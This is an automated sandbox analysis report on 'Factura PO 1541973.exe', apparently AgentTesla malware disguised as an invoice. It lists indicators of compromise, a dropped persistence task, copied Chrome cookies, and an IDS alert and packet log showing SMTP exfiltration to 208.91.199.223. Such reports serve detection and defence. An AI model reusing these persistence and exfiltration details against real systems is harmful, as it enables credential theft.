                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              08:04:17API Interceptor746x Sleep call for process: Factura PO 1541973.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              208.91.199.223SAUDI ARAMCO Tender Documents - BOQ and ITB.exeGet hashmaliciousBrowse
                                0PyeqVfoHGFVl2r.exeGet hashmaliciousBrowse
                                  Urgent Contract Order GH78566484,pdf.exeGet hashmaliciousBrowse
                                    ekrrUChjXvng9Vr.exeGet hashmaliciousBrowse
                                      order 4806125050.xlsxGet hashmaliciousBrowse
                                        BP4w3lADAPfOKmI.exeGet hashmaliciousBrowse
                                          PO -TXGU5022187.xlsxGet hashmaliciousBrowse
                                            FXDmHIiz25.exeGet hashmaliciousBrowse
                                              Urgent Contract Order GH7856648,pdf.exeGet hashmaliciousBrowse
                                                003BC09180600189.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Scr.Malcodegdn30.30554.exeGet hashmaliciousBrowse
                                                    MOQ FOB ORDER_________.exeGet hashmaliciousBrowse
                                                      YR1eBxhF96.exeGet hashmaliciousBrowse
                                                        Quote SEQTE00311701.xlsxGet hashmaliciousBrowse
                                                          sqQyO37l3c.exeGet hashmaliciousBrowse
                                                            Urgent RFQ_AP65425652_032421,pdf.exeGet hashmaliciousBrowse
                                                              INVOICE FOR PAYMENT_pdf____________________________________________.exeGet hashmaliciousBrowse
                                                                MOQ FOB ORDER.exeGet hashmaliciousBrowse
                                                                  Txw9tCLc1Q.exeGet hashmaliciousBrowse
                                                                    E8aAJC09lVhRGbK.exeGet hashmaliciousBrowse

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      us2.smtp.mailhostbox.comUrgent Contract Order GH7856648,pdf.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      NEW ORDER 112888#.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      SAUDI ARAMCO Tender Documents - BOQ and ITB.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      0PyeqVfoHGFVl2r.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      SecuriteInfo.com.MachineLearning.Anomalous.97.15449.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      lFccIK78FD.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      Urgent Contract Order GH78566484,pdf.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      MOQ FOB ORDER.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      JK6Ul6IKioPWJ6Y.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      ekrrUChjXvng9Vr.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      SecuriteInfo.com.Trojan.PackedNET.832.15445.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      order 4806125050.xlsxGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      SecuriteInfo.com.Trojan.PackedNET.831.28325.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      G8mumaTxk5kFdBG.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      Trial order 20210609.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      BP4w3lADAPfOKmI.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      4It7P3KCyYHUWHU.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      PO -TXGU5022187.xlsxGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      Bestil 5039066002128.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      COMPANY DOCUMENTS.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      PUBLIC-DOMAIN-REGISTRYUSUrgent Contract Order GH7856648,pdf.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      NEW ORDER 112888#.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      oRSxZhDFLi.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      SAUDI ARAMCO Tender Documents - BOQ and ITB.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      0PyeqVfoHGFVl2r.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                      • 207.174.212.247
                                                                      SecuriteInfo.com.MachineLearning.Anomalous.97.15449.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      lFccIK78FD.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      Order10 06 2021.docGet hashmaliciousBrowse
                                                                      • 162.215.241.145
                                                                      PO187439.exeGet hashmaliciousBrowse
                                                                      • 119.18.54.126
                                                                      Urgent Contract Order GH78566484,pdf.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      MOQ FOB ORDER.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      JK6Ul6IKioPWJ6Y.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      ekrrUChjXvng9Vr.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      SecuriteInfo.com.Trojan.PackedNET.832.15445.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      order 4806125050.xlsxGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      Bank Swift.docGet hashmaliciousBrowse
                                                                      • 162.215.241.145
                                                                      SecuriteInfo.com.Trojan.PackedNET.831.28325.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      Trial order 20210609.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      BP4w3lADAPfOKmI.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Factura PO 1541973.exe.log
                                                                      Process:C:\Users\user\Desktop\Factura PO 1541973.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:modified
                                                                      Size (bytes):1314
                                                                      Entropy (8bit):5.350128552078965
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                      MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                      SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                      SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                      SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                      Malicious:true
                                                                      Reputation:high, very likely benign file
                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                      C:\Users\user\AppData\Local\Temp\tmp2A03.tmp
                                                                      Process:C:\Users\user\Desktop\Factura PO 1541973.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1643
                                                                      Entropy (8bit):5.189995397126082
                                                                      Encrypted:false
                                                                      SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGNtn:cbhK79lNQR/rydbz9I3YODOLNdq3A
                                                                      MD5:581656AAF565B7599C874A18536B35B2
                                                                      SHA1:C24E3A41792AD6831F9E8091CC6A52D90DC07E92
                                                                      SHA-256:F5ECCB10AA1D316BF2E4EFEC8DB454A3D6CCCDE50C043EE0E1CA582A897EE11C
                                                                      SHA-512:C10C89D107C70488128EEB6D741BDFF1983972FEA38A812723412D8B2D2FD7232158C23BFF3ADDE8E6B99950F93A0305E0D975DB73FE53B752EDFD2634978744
                                                                      Malicious:true
                                                                      Reputation:low
                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                      C:\Users\user\AppData\Roaming\lVzZfJoExG.exe
                                                                      Process:C:\Users\user\Desktop\Factura PO 1541973.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):952832
                                                                      Entropy (8bit):7.634813259762412
                                                                      Encrypted:false
                                                                      SSDEEP:12288:t1+m5ABVldpNU3FVYWCMWrE0ak3wIJFr8JgoD1py2JeiluZM4e/ZUdtb:tPeeFVYAi3wIYJPDD5pluNeBUdt
                                                                      MD5:429A3063DB13E84F8E0843F46B60753E
                                                                      SHA1:DE9221C73FE3610393F1F9197DFECF0896ED776C
                                                                      SHA-256:62E122A12EA4CCACE679E22B13975E1F0E476DDA8373279D99B757635C8B06DC
                                                                      SHA-512:876D20B1E4ED70710184895303799CE258F98795B41180B90FDAEDCA572EF1CD45460B5B91DEB4C11A54545C2F38D1C00BEC3B72979E30C22DDB4D9ABA5ABB0A
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Metadefender, Detection: 23%, Browse
                                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                                      Reputation:low
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.............v.... ... ....@.. ....................................@.................................$...O.... ............................................................................... ............... ..H............text...|.... ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................X.......H........b..Lx...............$...........................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....o....(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0..<........~.....(1.....,!r...p.....(2...o3...s4............~.....+..*.0......
                                                                      C:\Users\user\AppData\Roaming\lVzZfJoExG.exe:Zone.Identifier
                                                                      Process:C:\Users\user\Desktop\Factura PO 1541973.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                      C:\Users\user\AppData\Roaming\znti2vkl.lrt\Chrome\Default\Cookies
                                                                      Process:C:\Users\user\Desktop\Factura PO 1541973.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):0.7006690334145785
                                                                      Encrypted:false
                                                                      SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                      MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                      SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                      SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                      SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.634813259762412
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:Factura PO 1541973.exe
                                                                      File size:952832
                                                                      MD5:429a3063db13e84f8e0843f46b60753e
                                                                      SHA1:de9221c73fe3610393f1f9197dfecf0896ed776c
                                                                      SHA256:62e122a12ea4ccace679e22b13975e1f0e476dda8373279d99b757635c8b06dc
                                                                      SHA512:876d20b1e4ed70710184895303799ce258f98795b41180b90fdaedca572ef1cd45460b5b91deb4c11a54545c2f38d1c00bec3b72979e30c22ddb4d9aba5abb0a
                                                                      SSDEEP:12288:t1+m5ABVldpNU3FVYWCMWrE0ak3wIJFr8JgoD1py2JeiluZM4e/ZUdtb:tPeeFVYAi3wIYJPDD5pluNeBUdt
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.............v.... ... ....@.. ....................................@................................

                                                                      File Icon

                                                                      Icon Hash:8c8caa8e9692aa00

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x4c0176
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x60C21B8B [Thu Jun 10 14:02:51 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:v4.0.30319
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc01240x4f.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc20000x2a394.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xee0000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xbffec0x1c.text
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000xbe17c0xbe200False0.949855666502370 sysV pure executable not stripped7.96018720186IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xc20000x2a3940x2a400False0.124404816938data4.17231984784IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0xee0000xc0x200False0.041015625data0.0776331623432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_ICON0xc22000x2326PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                      RT_ICON0xc45380x10828dBase III DBT, version number 0, next free block index 40
                                                                      RT_ICON0xd4d700x94a8data
                                                                      RT_ICON0xde2280x5488data
                                                                      RT_ICON0xe36c00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                      RT_ICON0xe78f80x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                                      RT_ICON0xe9eb00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                                                      RT_ICON0xeaf680x988data
                                                                      RT_ICON0xeb9000x468GLS_BINARY_LSB_FIRST
                                                                      RT_GROUP_ICON0xebd780x84data
                                                                      RT_VERSION0xebe0c0x388data
                                                                      RT_MANIFEST0xec1a40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Version Infos

                                                                      DescriptionData
                                                                      Translation0x0000 0x04b0
                                                                      LegalCopyrightPaul Harris 2016
                                                                      Assembly Version251.2.0.0
                                                                      InternalNameConstructorInfo.exe
                                                                      FileVersion251.2.0.0
                                                                      CompanyNamePaul Harris
                                                                      LegalTrademarks
                                                                      Comments1992 Alpine A 610
                                                                      ProductNameReloadManager
                                                                      ProductVersion251.2.0.0
                                                                      FileDescriptionReloadManager
                                                                      OriginalFilenameConstructorInfo.exe

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      06/11/21-08:06:02.993426TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49771587192.168.2.4208.91.199.223
                                                                      06/11/21-08:06:06.279511TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49772587192.168.2.4208.91.199.223

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jun 11, 2021 08:06:01.240387917 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:01.404711008 CEST58749771208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:01.404921055 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:01.980102062 CEST58749771208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:01.980814934 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:02.145400047 CEST58749771208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:02.145451069 CEST58749771208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:02.147583961 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:02.315876007 CEST58749771208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:02.316389084 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:02.483670950 CEST58749771208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:02.484386921 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:02.649792910 CEST58749771208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:02.650073051 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:02.825508118 CEST58749771208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:02.825818062 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:02.992470026 CEST58749771208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:02.993426085 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:02.993542910 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:02.994645119 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:02.994695902 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:03.157859087 CEST58749771208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:03.159264088 CEST58749771208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:03.280250072 CEST58749771208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:03.330709934 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:04.768742085 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:04.933777094 CEST58749771208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:04.933795929 CEST58749771208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:04.933985949 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:04.934179068 CEST49771587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:04.935074091 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:05.099284887 CEST58749772208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:05.099436998 CEST58749771208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:05.099498987 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:05.270102024 CEST58749772208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:05.270399094 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:05.434314966 CEST58749772208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:05.434417009 CEST58749772208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:05.434684992 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:05.602807999 CEST58749772208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:05.603249073 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:05.769443035 CEST58749772208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:05.769814968 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:05.934775114 CEST58749772208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:05.935218096 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:06.108582973 CEST58749772208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:06.109487057 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:06.275418997 CEST58749772208.91.199.223192.168.2.4
